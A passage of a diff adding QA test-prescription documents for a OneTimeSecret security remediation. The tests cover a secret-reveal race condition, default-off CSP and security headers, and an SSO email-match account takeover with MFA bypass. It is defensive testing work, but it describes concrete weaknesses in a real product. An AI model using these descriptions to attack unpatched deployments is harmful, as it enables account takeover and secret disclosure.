+| AC3 | Decrypt happens ONLY after a successful claim (never decrypt-then-claim) | C1-U-04, C1-I-04 |
+| AC4 | State precondition enforced server-side (not in-memory `@state`) | C1-U-03 |
+| AC5 | Wrong passphrase does NOT consume | C1-I-01, C1-I-04 |
+| AC6 | Correct passphrase + continue consumes exactly once | C1-I-02 |
+| AC7 | `continue` false/absent does not consume | C1-I-03 |
+| AC8 | Normal single reveal returns value + destroys (unchanged) | C1-I-05 |
+| AC9 | Burn is atomic — no double-burn | C1-C-04 |
+| AC10 | Reveal-vs-burn race: not both succeed | C1-C-05 |
+| AC11 | v1/v2 (v3 N/A today) reveal & burn parity via shared primitive | C1-I-06, C1-I-07 |
+| AC12 | Receipt state + `secrets_shared` update exactly once | C1-I-08, C1-I-09 |
+| AC13 | Verification-secret flow still works | C1-I-10, C1-I-11 |
+
+## Gaps / risks flagged
+
+- **R1 (highest): CI must run clustered Puma + a real Valkey for C1-C-01/02/04/05.** A single MRI process
+  hides the race (GIL). If the CI harness runs a single-process test server, these tests will pass
+  *vacuously* and give false assurance. Prescribe a dedicated CI job with `WEB_CONCURRENCY>=2` (or the
+  multi-process fork harness) and assert the *negative* (fail today, 12/12) before the fix lands, to prove
+  the test actually reproduces.
+- **R2: Determinism / flakiness.** The shared-deadline barrier (`deadline.txt`) is timing-based; on a slow
+  CI box workers may not overlap. Mitigate by (a) widening the deadline window, (b) increasing N to 30,
+  (c) asserting the property holds across repeated runs (e.g. 5 iterations), and (d) gating on the
+  in-process barrier variant (C1-C-03) as a deterministic floor.
+- **R3: PoC paths are hard-coded to `/home/user/security-assessment/...`.** The committed specs must NOT
+  depend on that absolute path; relocate fixtures into a tmp dir / `Dir.mktmpdir` and pass ids via
+  env/args. Note in the spec header.
+- **R4: Option A (Lua) vs Option B (WATCH) divergence.** Tests assert behaviour, not implementation, so
+  they cover either option — but C1-U-04 (raw fields out of `consume!`) assumes Option A's return shape;
+  if Option B is chosen, adapt C1-U-04 to assert the WATCH/MULTI claim instead of a returned field hash.
+- **R5: v3 parity is currently untestable** (no v3 secret logic exists). Tracked as a placeholder so a
+  future v3 reveal path is forced through the same `consume!` coverage.
+- **R6: Anonymous vs owner counters.** C1-I-08 must use a NON-anonymous owner; anonymous secrets skip
+  `owner.increment_field`, so an anon fixture would silently under-test the counter path.

--- a/docs/security/assessment-2026-06-22/test-plans/README.md
+++ b/docs/security/assessment-2026-06-22/test-plans/README.md
@@ -1,0 +1,65 @@
+# Test-case prescriptions — security remediation (assessment 2026-06-22)
+
+QA prescription documents for the OneTimeSecret security-remediation effort. Each file enumerates the
+test cases that MUST exist when the corresponding fix is implemented, so coverage is guaranteed up front.
+These are **prescriptions, not implementations** — they are written against the *prescribed* APIs in the
+resolution docs and intentionally land before (or alongside) the application code.
+
+Branch: `claude/vigilant-goldberg-97ijfl`. Source under test is READ-ONLY for QA; only this directory is
+authored.
+
+## Index
+
+| Plan | Resolutions covered | Cases | Headline gate |
+|---|---|---|---|
+| [`C1.md`](./C1.md) | C1 — atomic one-time consume (reveal/burn) | 23 | Multi-process race: N reveals → exactly 1 plaintext |
+| [`S1-S2.md`](./S1-S2.md) | S1 — CSP default-on; S2 — security headers default-on | 21 | Default boot is secure-by-default; SPA enforces CSP with zero violations |
+| [`SSO-3499-A1-A4-A2.md`](./SSO-3499-A1-A4-A2.md) | #3499, A1 — secure linking, A4 — domain allowlist on linking, A2 — MFA not bypassed | 30 | SSO email-match takeover blocked; SSO no longer bypasses enrolled MFA |
+
+Total prescribed test cases: **74** (C1: 23, S1/S2: 21, SSO: 30).
+
+## How each case is specified
+
+For every test case: **ID · title · layer · target file/spec path · preconditions/fixtures · action ·
+expected result · case type** (regression / negative / concurrency / edge). Each plan ends with a
+**coverage matrix** (resolution acceptance criteria → test IDs) and a **Gaps / Risks** section.
+
+### Layers / where tests live
+- **unit** — RSpec model/operation specs and `try/` tryouts (`#=>` doctest format). No HTTP.
+- **integration** — RSpec exercising logic classes / Rodauth callbacks end to end against real
+  Valkey + AUTH DB (`apps/api/v{1,2}/spec/logic/secrets/`, `apps/web/auth/spec/integration/full/`,
+  `spec/integration/...`).
+- **concurrency** — multi-PROCESS harness (the C1 PoC under `../poc/`). A single MRI process cannot
+  reproduce the reveal race (GIL); the in-process thread variant is a weaker secondary check only.
+- **e2e** — Playwright under `e2e/` (CSP enforcement, clickjacking, SSO callback in-browser).
+
+## Top cross-cutting risks (see each plan for the full list)
+
+1. **A2 reverses a shipped behaviour and an existing passing spec.**
+   `apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb` currently asserts SSO bypasses MFA
+   (`sso_bypass`, issue #3114). The A2 fix makes that wrong; those examples must be rewritten in the same
+   PR (prescribed as SSO-U-08..12) or CI goes red. **Highest-attention item.**
+2. **Concurrency tests need a clustered Puma + real Valkey in CI.** Run single-process and C1's race
+   tests pass vacuously (false green). Prove they reproduce (fail today, 12/12) before the fix lands.
+3. **ERB-at-boot env timing (S1/S2 and SSO integration).** Defaults and SSO route registration are baked
+   from ENV at boot. Toggle tests must reboot inside the env block (`ClimateControl` +
+   `Onetime.boot!(:test, force: true)`); SSO integration needs `ORGS_SSO_ENABLED=true` at process start
+   or every example self-skips.
+4. **Prescribed-but-unspecified surfaces.** `consume!` return shape (Lua vs WATCH),
+   `resolve_omniauth_email`/`email_claim_verified?` provider table, `trust_idp_mfa`/`amr`/`acr` inputs,
+   CSP Report-Only flag name, and the explicit-link `auth_error` code are not finalized in the resolutions.
+   The plans assert behaviour and call out the exact spots to re-pin once the code lands.
+5. **No v3 secret logic exists today** — "v1/v2/v3 reveal parity" reduces to v1+v2 through the shared
+   model primitive; a placeholder gap tracks future v3.
+
+## Reference inputs
+
+- Resolutions: `../resolutions/{C1,S1,S2,A1,A2,A4}-*.md`
+- PoC harness: `../poc/{_setup_secret.rb,_reveal_worker.rb,race_reveal.sh,race_reveal_model.rb,headers_check.rb}`
+- Evidence: `../evidence/{race_poc_output.txt,headers_output.txt}`
+- Mirrored specs: `apps/api/v2/spec/logic/secrets/burn_secret_spec.rb`,
+  `apps/web/auth/spec/integration/full/omniauth_missing_email_spec.rb`,
+  `apps/web/auth/spec/config/features/mfa_spec.rb`,
+  `apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb`,
+  `spec/integration/full/env_toggles/security_features_spec.rb`,
+  `e2e/auth/sso-missing-email.spec.ts`, `e2e/all/secret-context.spec.ts`

--- a/docs/security/assessment-2026-06-22/test-plans/README.md
+++ b/docs/security/assessment-2026-06-22/test-plans/README.md
@@ -56,7 +56,7 @@ expected result · case type** (regression / negative / concurrency / edge). Eac
 
 - Resolutions: `../resolutions/{C1,S1,S2,A1,A2,A4}-*.md`
 - PoC harness: `../poc/{_setup_secret.rb,_reveal_worker.rb,race_reveal.sh,race_reveal_model.rb,headers_check.rb}`
-- Evidence: `../evidence/{race_poc_output.txt,headers_output.txt}`
+- Evidence: `../evidence/{race_poc_output.md,headers_output.md}`
 - Mirrored specs: `apps/api/v2/spec/logic/secrets/burn_secret_spec.rb`,
   `apps/web/auth/spec/integration/full/omniauth_missing_email_spec.rb`,
   `apps/web/auth/spec/config/features/mfa_spec.rb`,

--- a/docs/security/assessment-2026-06-22/test-plans/S1-S2.md
+++ b/docs/security/assessment-2026-06-22/test-plans/S1-S2.md
@@ -1,0 +1,249 @@
+# S1 / S2 — Secure headers default-on (CSP, frame-options, HSTS, COOP) — TEST PRESCRIPTION
+
+- **Resolutions under test:** `../resolutions/S1-csp-default-on.md`, `../resolutions/S2-security-headers-default-on.md`
+- **Status:** Prescribed *before* implementation. The fix is config-default flips
+  (`CSP_ENABLED`→true; `frame_options`, `strict_transport`, `http_origin`→true; add COOP) plus an
+  HSTS-on-HTTPS guard. Tests assert the **default boot** (no env overrides) is secure and that operator
+  overrides still disable.
+- **Primary source touched by the fix:**
+  - `etc/defaults/config.defaults.yaml` (~314-353: `http_origin`, `xss_header`, `frame_options`,
+    `strict_transport`, `security.csp.enabled`)
+  - `apps/api/v1/controllers/helpers.rb:163-213` (`add_response_headers` / CSP construction)
+  - `lib/onetime/middleware/security.rb` (Rack::Protection wiring: FrameOptions, StrictTransport,
+    HttpOrigin, + new COOP header)
+- **PoC harness to reuse:** `../poc/headers_check.rb` (dumps actual response headers from the booted stack
+  via `Rack::MockRequest` over the real url-map), `../poc/boot_app.sh`.
+- **Style mirrored from:** `spec/integration/full/env_toggles/security_features_spec.rb` (Rack::Test +
+  `climate_control` for env toggles + `Onetime::Application::Registry.generate_rack_url_map`),
+  `e2e/all/secret-context.spec.ts` (Playwright structure), `e2e/auth/sso-csrf.spec.ts`.
+
+## Conventions used below
+
+- **Layer = `integration`** → RSpec under `spec/integration/full/env_toggles/` (or
+  `spec/integration/headers/`), Rack::Test against `generate_rack_url_map`, using `ClimateControl.modify`
+  to set/unset `CSP_ENABLED`, `MIDDLEWARE_*`, `SSL`. **MUST reboot** the app inside the env block because
+  `config.defaults.yaml` is ERB-evaluated at boot (env read once — see the `omniauth_missing_email_spec`
+  header note about ERB timing).
+- **Layer = `e2e`** → Playwright under `e2e/all/` (or `e2e/csp/`), CSP **enforcing**, asserting ZERO
+  console CSP-violation messages.
+- **Layer = `tryout`** → `headers_check.rb`-style single-process header dump assertion.
+
+> ENV-TIMING GOTCHA (call out in every spec header): defaults are baked at boot via ERB
+> (`ENV['CSP_ENABLED'] == 'true'`). Setting the env *after* boot does nothing. Each toggle example must
+> wrap boot in `ClimateControl.modify(...) { Onetime.boot!(:test, force: true); ... }` or use a
+> per-example sub-process, mirroring how the auth specs force a reboot.
+
+---
+
+## 1. CSP default-on (S1)
+
+### S1-I-01 — default boot (no `CSP_ENABLED`) emits a Content-Security-Policy header
+- **Layer:** integration
+- **Target file:** `spec/integration/headers/csp_default_spec.rb` (new)
+- **Preconditions/fixtures:** env with `CSP_ENABLED` UNSET (and `MIDDLEWARE_*` unset); reboot.
+- **Action:** `GET /api/v2/status` and `GET /`.
+- **Expected:** `Content-Security-Policy` header present and non-empty on BOTH (today it is `<ABSENT>` per
+  `../evidence/headers_output.txt`).
+- **Type:** regression (default-secure). Primary S1 gate.
+
+### S1-I-02 — CSP `script-src` is nonce-based with NO `unsafe-inline`/`unsafe-eval`
+- **Layer:** integration
+- **Target:** same spec.
+- **Action:** parse the CSP value into directives.
+- **Expected:** `script-src` contains `'nonce-…'`, does NOT contain `'unsafe-inline'` and NOT
+  `'unsafe-eval'`; `default-src 'none'`; `object-src 'none'`; `base-uri 'self'`; `form-action 'self'`;
+  `frame-ancestors 'none'`. (Matches the prod branch in `helpers.rb:193-207`.)
+- **Type:** edge / contract.
+
+### S1-I-03 — the nonce in the CSP header matches every rendered `<script nonce=…>` and no inline script slips through
+- **Layer:** integration
+- **Target:** `spec/integration/headers/csp_nonce_consistency_spec.rb` (new)
+- **Preconditions:** `GET /` (server-rendered rhales bootstrap + Vite entry); CSP enabled.
+- **Action:** extract `nonce-XXX` from the CSP header; scan the HTML body for `<script>` tags.
+- **Expected:** every `<script>` that has a body or `src` carries `nonce="XXX"` matching the header nonce;
+  ZERO inline `<script>` without the nonce; ZERO inline `on*=` event-handler attributes. Nonce is unique
+  per response (two requests → two different nonces).
+- **Type:** edge / contract (this is the S1 "verify nonce path end-to-end" acceptance item).
+
+### S1-I-04 — dev mode CSP retains nonce-only script-src (no unsafe-inline for scripts) but relaxes connect-src
+- **Layer:** integration
+- **Target:** `csp_default_spec.rb`.
+- **Preconditions:** boot with `development.enabled=true`.
+- **Action:** read CSP.
+- **Expected:** dev branch (`helpers.rb:176-191`) still `script-src 'nonce-…'` (no unsafe-inline for
+  scripts), `style-src` may include `'unsafe-inline'`, `connect-src` allows `ws:`/`http:` for HMR. Pins
+  that dev does NOT weaken script protection.
+- **Type:** edge.
+
+### S1-I-05 — operator override `CSP_ENABLED=false` still disables CSP
+- **Layer:** integration
+- **Target:** `csp_default_spec.rb`.
+- **Preconditions:** `ClimateControl.modify('CSP_ENABLED' => 'false')` + reboot.
+- **Action:** `GET /api/v2/status`.
+- **Expected:** no `Content-Security-Policy` header (operator escape hatch preserved).
+- **Type:** negative / config.
+
+### S1-I-06 — Report-Only staging mode emits `Content-Security-Policy-Report-Only` (not enforcing) with a report sink
+- **Layer:** integration
+- **Target:** `spec/integration/headers/csp_report_only_spec.rb` (new)
+- **Preconditions:** the staging flag the fix introduces (e.g. `CSP_REPORT_ONLY=true`) + reboot.
+- **Action:** `GET /`.
+- **Expected:** header is `Content-Security-Policy-Report-Only` (NOT `Content-Security-Policy`); a
+  `report-uri`/`report-to` directive is present; same policy string otherwise. Promotion path: with the
+  flag off it becomes enforcing.
+- **Type:** edge / staging. Flag as a gap if the resolution does not yet name the report flag (see Risks).
+
+---
+
+## 2. Other security headers default-on (S2)
+
+### S2-I-01 — default boot emits `X-Frame-Options` AND CSP `frame-ancestors 'none'`
+- **Layer:** integration
+- **Target file:** `spec/integration/headers/security_headers_default_spec.rb` (new)
+- **Preconditions:** all `MIDDLEWARE_*` unset; reboot.
+- **Action:** `GET /api/v2/status` and `GET /`.
+- **Expected:** `X-Frame-Options` present (`DENY` or `SAMEORIGIN`) AND `frame-ancestors 'none'` in CSP →
+  layered clickjacking protection. (Today `X-Frame-Options` is `<ABSENT>`.)
+- **Type:** regression (default-secure).
+
+### S2-I-02 — HSTS present ONLY under HTTPS, ABSENT on plain-HTTP dev
+- **Layer:** integration
+- **Target:** `security_headers_default_spec.rb`.
+- **Preconditions:** two reboots — one with `SSL=true`/HTTPS request env, one plain HTTP (`rack.url_scheme`
+  = http, default dev).
+- **Action:** `GET /api/v2/status` in each.
+- **Expected:** HTTPS → `Strict-Transport-Security` present with sane `max-age` (e.g.
+  `max-age=31536000; includeSubDomains`); plain HTTP → header ABSENT (no dev breakage). This is the
+  HSTS-on-HTTPS guard.
+- **Type:** edge / regression (the riskiest S2 behaviour — HSTS is sticky).
+
+### S2-I-03 — `X-Content-Type-Options: nosniff` and `Referrer-Policy` retained
+- **Layer:** integration
+- **Target:** `security_headers_default_spec.rb`.
+- **Action:** read headers on default boot.
+- **Expected:** `X-Content-Type-Options: nosniff` and a `Referrer-Policy` value still present (they were
+  already on — must not regress when the others flip on).
+- **Type:** regression.
+
+### S2-I-04 — `Cross-Origin-Opener-Policy: same-origin` added by default
+- **Layer:** integration
+- **Target:** `security_headers_default_spec.rb`.
+- **Action:** read headers.
+- **Expected:** `Cross-Origin-Opener-Policy: same-origin` present (currently `<ABSENT>` everywhere per the
+  PoC's header list). Optionally assert `Cross-Origin-Resource-Policy` if the fix adds it.
+- **Type:** regression (new control).
+
+### S2-I-05 — `http_origin` default-on validates Origin/Referer for state-changing requests
+- **Layer:** integration
+- **Target:** `spec/integration/headers/http_origin_default_spec.rb` (new); coordinate with P1.
+- **Preconditions:** default boot; a state-changing POST (e.g. `/api/v2/secret/conceal`) with a
+  cross-origin `Origin` header.
+- **Action:** POST with mismatched Origin vs. with a matching/absent Origin.
+- **Expected:** mismatched cross-origin POST is rejected (Rack::Protection::HttpOrigin); same-origin/no-
+  Origin proceeds. (Note: coordinate with P1 CSRF; flag if landing separately.)
+- **Type:** negative / regression.
+
+### S2-I-06 — operator overrides still disable each header
+- **Layer:** integration
+- **Target:** `security_headers_default_spec.rb`.
+- **Preconditions:** `MIDDLEWARE_FRAME_OPTIONS=false`, `MIDDLEWARE_STRICT_TRANSPORT=false`,
+  `MIDDLEWARE_HTTP_ORIGIN=false` (separately) + reboot.
+- **Action:** read headers / probe.
+- **Expected:** each respective header/protection is absent when explicitly disabled — escape hatch intact.
+- **Type:** negative / config.
+
+### S2-I-07 (tryout) — `headers_check.rb` re-run shows all controls present on default install
+- **Layer:** tryout
+- **Target:** `try/security/security_headers_default_try.rb` (new), adapted from `../poc/headers_check.rb`.
+- **Action:** dump the same SECURITY_HEADERS list on default boot.
+- **Expected:** none are `<ABSENT>` except HSTS on plain HTTP. Regenerates `evidence/headers_output.txt`
+  green — the assessment's "re-run shows it present" acceptance item.
+- **Type:** regression / evidence.
+
+---
+
+## 3. SPA / browser enforcement (S1 + S4/S5 reconciliation)
+
+### S1-E-01 — Playwright smoke: load home + conceal + reveal with CSP ENFORCING → ZERO console CSP violations
+- **Layer:** e2e (Playwright)
+- **Target file:** `e2e/all/csp-enforcing.spec.ts` (new); structure per `e2e/all/secret-context.spec.ts`.
+- **Preconditions:** app served with `CSP_ENABLED=true` ENFORCING (not Report-Only); production-like build
+  (nonce path live). Attach a `page.on('console')` and `page.on('pageerror')` collector that captures any
+  message matching `/content security policy|refused to (execute|load|connect|apply)/i`.
+- **Action:** (1) load `/`; (2) conceal a secret via the UI; (3) open the share link and reveal; assert
+  the plaintext renders.
+- **Expected:** all three steps succeed AND the collected CSP-violation array is EMPTY. The flows work
+  under enforcement.
+- **Type:** e2e / regression (the S1 "zero console CSP violations" acceptance gate).
+
+### S1-E-02 — DNS widget inline script (S5) does not violate the enforced policy
+- **Layer:** e2e
+- **Target:** `e2e/all/csp-enforcing.spec.ts` (a context that exercises the DNS-widget view,
+  `useDnsWidget.ts:155-163`).
+- **Preconditions:** CSP enforcing; navigate to a view that mounts the DNS widget.
+- **Action:** trigger the widget; watch for CSP violations.
+- **Expected:** the widget's injected script carries the per-response nonce (S5 fix) → NO `script-src`
+  violation; widget functions.
+- **Type:** e2e / regression (cross-fix reconciliation with S5).
+
+### S1-E-03 — GlobalBroadcast `v-html` (S4) renders sanitized content with NO CSP violation
+- **Layer:** e2e
+- **Target:** `e2e/all/csp-enforcing.spec.ts`.
+- **Preconditions:** CSP enforcing; a configured global broadcast message.
+- **Action:** load a page that renders the broadcast banner.
+- **Expected:** sanitized HTML renders; no inline-style/script CSP violation attributable to the broadcast
+  (S4 keeps it sanitized/same-origin).
+- **Type:** e2e / regression (cross-fix reconciliation with S4).
+
+### S1-E-04 — cross-origin framing is blocked in a real browser (clickjacking probe)
+- **Layer:** e2e
+- **Target:** `e2e/all/clickjacking.spec.ts` (new)
+- **Preconditions:** default-secure boot.
+- **Action:** load an attacker page that embeds the app in an `<iframe>` from a different origin.
+- **Expected:** the frame fails to render the app (blocked by `X-Frame-Options`/`frame-ancestors`);
+  console shows the refusal.
+- **Type:** e2e / negative (S2 clickjacking acceptance probe).
+
+---
+
+## Coverage matrix — S1/S2 acceptance criteria → test IDs
+
+| # | Acceptance criterion | Test IDs |
+|---|---|---|
+| S1-AC1 | Default boot (no `CSP_ENABLED`) emits strong CSP | S1-I-01, S2-I-07 |
+| S1-AC2 | Nonce-based `script-src`, no `unsafe-inline`/`unsafe-eval` for scripts | S1-I-02, S1-I-04 |
+| S1-AC3 | Nonce on every rendered `<script>`, no inline script slips through | S1-I-03 |
+| S1-AC4 | Report-Only staging behaves (report sink, not enforcing) | S1-I-06 |
+| S1-AC5 | Operator `CSP_ENABLED=false` still disables | S1-I-05 |
+| S1-AC6 | SPA Playwright smoke (home+conceal+reveal) ZERO console CSP violations | S1-E-01 |
+| S1-AC7 | DNS widget (S5) & GlobalBroadcast v-html (S4) don't violate enforced policy | S1-E-02, S1-E-03 |
+| S2-AC1 | `X-Frame-Options` + `frame-ancestors` present by default | S2-I-01 |
+| S2-AC2 | HSTS ONLY under HTTPS, absent on plain-HTTP dev | S2-I-02 |
+| S2-AC3 | `nosniff` + `Referrer-Policy` retained | S2-I-03 |
+| S2-AC4 | COOP `same-origin` added | S2-I-04 |
+| S2-AC5 | `http_origin` validates Origin/Referer (state-changing) | S2-I-05 |
+| S2-AC6 | Clickjacking probe blocked in-browser | S1-E-04 |
+| S2-AC7 | Operator overrides still disable each header | S1-I-05, S2-I-06 |
+
+## Gaps / risks flagged
+
+- **R1: ERB-at-boot env timing.** Every toggle test MUST reboot inside the env block; a naive
+  `ENV['CSP_ENABLED']='true'` after boot is a no-op and would make these specs assert stale defaults.
+  Highest source of false-green here. Prescribe `ClimateControl` + `Onetime.boot!(:test, force: true)`.
+- **R2: Report-Only flag is not named in the resolution.** S1 prescribes Report-Only staging but the
+  config key/env is unspecified. S1-I-06 assumes `CSP_REPORT_ONLY` + a `report-uri`/`report-to`; confirm
+  the real key when the fix lands and update. If staging is dropped, mark S1-AC4 as a documented gap.
+- **R3: HSTS sticky-state.** S2-I-02 must run the HTTP (no-HSTS) assertion in isolation from any HTTPS
+  example in the same browser context; in Playwright (S-E) never let an HSTS header leak into a later
+  HTTP nav (use a fresh context). Real-browser HSTS caching can cause cross-test contamination.
+- **R4: e2e needs the nonce/production build.** S1-E-01..03 only catch inline-script regressions against a
+  real Vite build with the server nonce wired; running them against the dev HMR server (which relaxes
+  connect-src and may inject HMR scripts) would mask violations. Pin the e2e job to a production-like
+  build with CSP enforcing.
+- **R5: COOP/CORP placement.** S2-I-04 assumes the new COOP header is added in the middleware/helpers
+  path that `headers_check.rb` observes; if added only at the reverse proxy (Caddy), the app-level test
+  will fail — which is correct per S2's "app should be safe by itself" stance. Flag that COOP must be
+  emitted by the app, not only Caddy.
+- **R6: `http_origin` coupling with P1.** S2-I-05 may fail or change shape depending on how P1's CSRF
+  hardening interacts with HttpOrigin. Coordinate landing; if they ship separately, gate S2-I-05 behind
+  the P1 fix.

--- a/docs/security/assessment-2026-06-22/test-plans/S1-S2.md
+++ b/docs/security/assessment-2026-06-22/test-plans/S1-S2.md
@@ -43,7 +43,7 @@
 - **Preconditions/fixtures:** env with `CSP_ENABLED` UNSET (and `MIDDLEWARE_*` unset); reboot.
 - **Action:** `GET /api/v2/status` and `GET /`.
 - **Expected:** `Content-Security-Policy` header present and non-empty on BOTH (today it is `<ABSENT>` per
-  `../evidence/headers_output.txt`).
+  `../evidence/headers_output.md`).
 - **Type:** regression (default-secure). Primary S1 gate.
 
 ### S1-I-02 — CSP `script-src` is nonce-based with NO `unsafe-inline`/`unsafe-eval`
@@ -156,7 +156,7 @@
 - **Layer:** tryout
 - **Target:** `try/security/security_headers_default_try.rb` (new), adapted from `../poc/headers_check.rb`.
 - **Action:** dump the same SECURITY_HEADERS list on default boot.
-- **Expected:** none are `<ABSENT>` except HSTS on plain HTTP. Regenerates `evidence/headers_output.txt`
+- **Expected:** none are `<ABSENT>` except HSTS on plain HTTP. Regenerates `evidence/headers_output.md`
   green — the assessment's "re-run shows it present" acceptance item.
 - **Type:** regression / evidence.
 

--- a/docs/security/assessment-2026-06-22/test-plans/SSO-3499-A1-A4-A2.md
+++ b/docs/security/assessment-2026-06-22/test-plans/SSO-3499-A1-A4-A2.md
@@ -1,0 +1,381 @@
+# SSO #3499 + A1 / A4 / A2 — Secure account linking, domain allowlist, MFA — TEST PRESCRIPTION
+
+- **Resolutions under test:** `../resolutions/A1-sso-account-linking.md`,
+  `../resolutions/A4-sso-domain-allowlist.md`, `../resolutions/A2-sso-mfa-bypass.md`; design issue #3499
+  (`resolve_omniauth_email`, claim trust tiers).
+- **Status:** Prescribed *before* implementation. Tests are written against the prescribed helpers
+  (`resolve_omniauth_email`, `email_claim_verified?`, `account_has_other_authenticators?`,
+  `omniauth_email_domain_allowed?`) and the reworked `account_from_omniauth` + `detect_mfa_requirement`.
+- **Primary source touched by the fix:**
+  - `apps/web/auth/config/hooks/omniauth.rb` (`account_from_omniauth:27-30`,
+    `before_omniauth_create_account:133-180`)
+  - `apps/web/auth/config/features/omniauth.rb` (`omniauth_verify_account? true`)
+  - `apps/web/auth/operations/detect_mfa_requirement.rb` (the `via_omniauth` short-circuit — **must be
+    reworked**, see R1) and `apps/web/auth/config/hooks/login.rb`
+  - fork `rodauth-omniauth/lib/rodauth/features/omniauth.rb` (`account_identities` (provider,uid) keying,
+    `_account_from_omniauth_identity` vs `_account_from_omniauth`)
+- **Style mirrored from:**
+  - `apps/web/auth/spec/integration/full/omniauth_missing_email_spec.rb` (full-mode integration,
+    `setup_entra_mock_auth`, `post_sso_callback`, `expect_auth_error_redirect`, `configure_allowed_domains`,
+    `enable_platform_fallback`, ORGS_SSO_ENABLED requirement)
+  - `apps/web/auth/spec/integration/full/omniauth_domain_restriction_spec.rb` (creation-path domain tests)
+  - `apps/web/auth/spec/config/features/mfa_spec.rb` (feature presence, `create_rodauth_app`)
+  - `apps/web/auth/spec/unit/detect_mfa_requirement_spec.rb` (pure-function MFA decision unit)
+  - `apps/web/auth/spec/support/{omniauth_test_helper.rb, mock_omniauth_strategy.rb}`
+
+## Conventions used below
+
+- **Layer = `unit`** → RSpec under `apps/web/auth/spec/unit/` (pure helpers: `resolve_omniauth_email`,
+  `email_claim_verified?`, `detect_mfa_requirement`). No HTTP, no DB where avoidable.
+- **Layer = `integration`** → RSpec under `apps/web/auth/spec/integration/full/`, full app boot, Rack::Test,
+  `setup_entra_mock_auth` + `post_sso_callback`. Requires `ORGS_SSO_ENABLED=true` (from `.env.test`),
+  `AUTHENTICATION_MODE=full`, AUTH_DATABASE_URL, Valkey on the test port; examples self-skip via the 404
+  guard if SSO routes aren't registered (copy `post_sso_callback`).
+- **Layer = `e2e`** → Playwright under `e2e/auth/` (mirror `e2e/auth/sso-missing-email.spec.ts`).
+- **Fixtures:** extend `setup_entra_mock_auth` to accept `email_verified:` and an `amr:`/`acr:` for the
+  raw_info so verification-gate and MFA-credit cases can be expressed.
+
+> SEED HELPER NEEDED: A1/A4 require seeding a PRE-EXISTING PASSWORD account (`victim@corp.com`) and a
+> PURE-SSO account (no password, keyed by (provider,uid)) before the callback. Prescribe a
+> `seed_password_account(email:)` and `seed_sso_account(provider:, uid:, email:)` helper in
+> `apps/web/auth/spec/support/omniauth_test_helper.rb`.
+
+---
+
+## 1. `resolve_omniauth_email` tier resolution & verification gate (#3499)
+
+### SSO-U-01 — Tier-1 resolution: `info.email` is used
+- **Layer:** unit
+- **Target file:** `apps/web/auth/spec/unit/resolve_omniauth_email_spec.rb` (new)
+- **Preconditions:** stub omniauth params with `info.email = 'alice@corp.com'`, `email_verified: true`.
+- **Action:** call `resolve_omniauth_email`.
+- **Expected:** returns normalized `'alice@corp.com'`.
+- **Type:** happy-path.
+
+### SSO-U-02 — Tier-1 fallback: `raw_info["mail"]` used when `info.email` absent
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** `info.email` nil, `extra.raw_info['mail'] = 'bob@corp.com'`, verified.
+- **Action:** call `resolve_omniauth_email`.
+- **Expected:** returns `'bob@corp.com'` (normalized).
+- **Type:** edge.
+
+### SSO-U-03 — Tier-2 claims (`upn`, `preferred_username`) are NEVER used for the email
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** `info.email` nil, `raw_info['mail']` nil, but `raw_info['upn']` /
+  `raw_info['preferred_username']` carry email-shaped values; `email_verified: true`.
+- **Action:** call `resolve_omniauth_email`.
+- **Expected:** returns `nil` (Tier-2 excluded per #3499). No email surfaced for lookup/linking/creation.
+- **Type:** negative / contract.
+
+### SSO-U-04 — verified-email gate: `email_verified: true` → email returned
+- **Layer:** unit
+- **Target:** `apps/web/auth/spec/unit/email_claim_verified_spec.rb` (new)
+- **Preconditions:** provider `oidc`, `info.email='x@corp.com'`, `email_verified: true`.
+- **Action:** `email_claim_verified?` then `resolve_omniauth_email`.
+- **Expected:** `true`; email returned.
+- **Type:** happy-path.
+
+### SSO-U-05 — verified-email gate: `email_verified: false` → email NOT returned
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** provider `oidc`, `email_verified: false`.
+- **Action:** `resolve_omniauth_email`.
+- **Expected:** returns `nil` (verification fails closed).
+- **Type:** negative.
+
+### SSO-U-06 — verified-email gate: `email_verified` ABSENT → provider-policy fallback decides
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** provider `oidc` with `email_verified` absent; toggle
+  `provider_guarantees_verified_email?` true vs false.
+- **Action:** `email_claim_verified?`.
+- **Expected:** when the provider is NOT in the implicit-trust set → `false` → no email; when it is → email
+  returned. Default for an unknown provider is `false` (the `else false` branch).
+- **Type:** edge / negative (the takeover-relevant default: absent ⇒ untrusted).
+
+### SSO-U-07 — unknown/self-service provider → not verified by default
+- **Layer:** unit
+- **Target:** same spec.
+- **Preconditions:** provider `'some_oidc_tenant'` not in the trusted set, even `email_verified: true`
+  asserted by an untrusted tenant.
+- **Action:** `email_claim_verified?`.
+- **Expected:** policy returns whatever the provider table dictates; document that tenant-asserted
+  `true` does NOT itself grant linking (Layer-2 still blocks merge — see SSO-I-04).
+- **Type:** negative / boundary.
+
+---
+
+## 2. A1 — secure linking (no silent merge into password accounts)
+
+### SSO-I-01 — TAKEOVER REGRESSION: new (provider,uid) asserting an existing PASSWORD account's email with `email_verified` absent/false → NO login, NOT linked, explicit-link redirect
+- **Layer:** integration
+- **Target file:** `apps/web/auth/spec/integration/full/omniauth_account_linking_spec.rb` (new)
+- **Preconditions:** seed a PASSWORD account `victim@corp.com` (has password hash). Mock OmniAuth
+  `provider=:oidc`, NEW `uid`, `info.email='victim@corp.com'`, `email_verified` absent (variant: false).
+  Domain allowlist unset (isolate the linking gate).
+- **Action:** `post_sso_callback(:oidc)`.
+- **Expected:** NO authenticated session established; `account_identities` has NO new (oidc,uid) row for
+  the victim account; redirect to the explicit-link message
+  (`/signin?...requires_explicit_link`/`login_required`-shaped, per `set_omniauth_error
+  :requires_explicit_link`). Victim's password account is untouched.
+- **Type:** **negative / takeover regression — PRIMARY A1 gate.**
+
+### SSO-I-02 — same as SSO-I-01 with `email_verified: true` from an untrusted tenant → STILL no silent merge (Layer 2)
+- **Layer:** integration
+- **Target:** same spec.
+- **Preconditions:** seed password account; mock callback with `email_verified: true` but provider is an
+  untrusted/self-service tenant connection; new uid.
+- **Action:** `post_sso_callback`.
+- **Expected:** still NO login, NOT linked, explicit-link redirect — because Layer 2 forbids auto-merge
+  into a password/other-authenticator account regardless of a claimed-true verification.
